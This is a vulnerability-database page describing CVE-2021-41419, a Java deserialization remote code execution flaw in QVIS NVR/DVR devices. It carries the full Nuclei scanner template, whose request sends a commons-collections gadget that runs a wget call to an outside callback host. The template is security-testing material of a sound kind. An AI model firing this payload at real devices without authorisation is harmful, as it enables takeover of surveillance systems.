Lucene search
K

QVIS NVR/DVR - Remote Code Execution

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

QVIS NVR/DVR before 2021-12-13 is vulnerable to remote code execution via Java deserialization.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-41419
18 Jul 202200:15
attackerkb
Circl
CVE-2021-41419
3 Nov 202521:02
circl
CNNVD
QVIS NVR Camera Management System 代码问题漏洞
17 Jul 202200:00
cnnvd
CVE
CVE-2021-41419
17 Jul 202223:23
cve
Cvelist
CVE-2021-41419
17 Jul 202223:23
cvelist
EUVD
EUVD-2021-28446
3 Oct 202520:07
euvd
NVD
CVE-2021-41419
18 Jul 202200:15
nvd
OSV
CVE-2021-41419
18 Jul 202200:15
osv
Prion
Deserialization of untrusted data
18 Jul 202200:15
prion
VulnCheck KEV
VulnCheck KEV: CVE-2021-41419
1 Feb 202600:00
vulncheck_kev
Rows per page
id: CVE-2021-41419

info:
  name: QVIS NVR/DVR - Remote Code Execution
  author: me9187
  severity: critical
  description: |
    QVIS NVR DVR before 2021-12-13 is vulnerable to Remote Code Execution via Java deserialization.
  impact: |
    Attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: |
    Update to the latest version or apply security patches provided by the vendor.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41419
    - https://gist.github.com/Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee/712ac36c8a08e2698e875169442a23a4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-41419
    cwe-id: CWE-502
    epss-score: 0.06757
    epss-percentile: 0.93189
    cpe: cpe:2.3:o:qvis:dvr_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: qvis
    product: dvr_firmware
  tags: cve,cve2021,qvisdvr,rce,deserialization,jsf,iot,oast,vkev

http:
  - raw:
      - |
        GET /qvisdvr/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}

    extractors:
      - type: regex
        name: token
        group: 1
        internal: true
        part: header
        regex:
          - "JSESSIONID=(.*)"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: status
        status:
          - 500
# digest: 490a00463044022060e195d7f6be27291fcfe226df371d66cf63dbe30831f9f57808217594ab15d902207581e51be49fa4f6bc59154a9d597e260cd0cbe9e4e49bca8e06b1f7831a4535:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.06757
16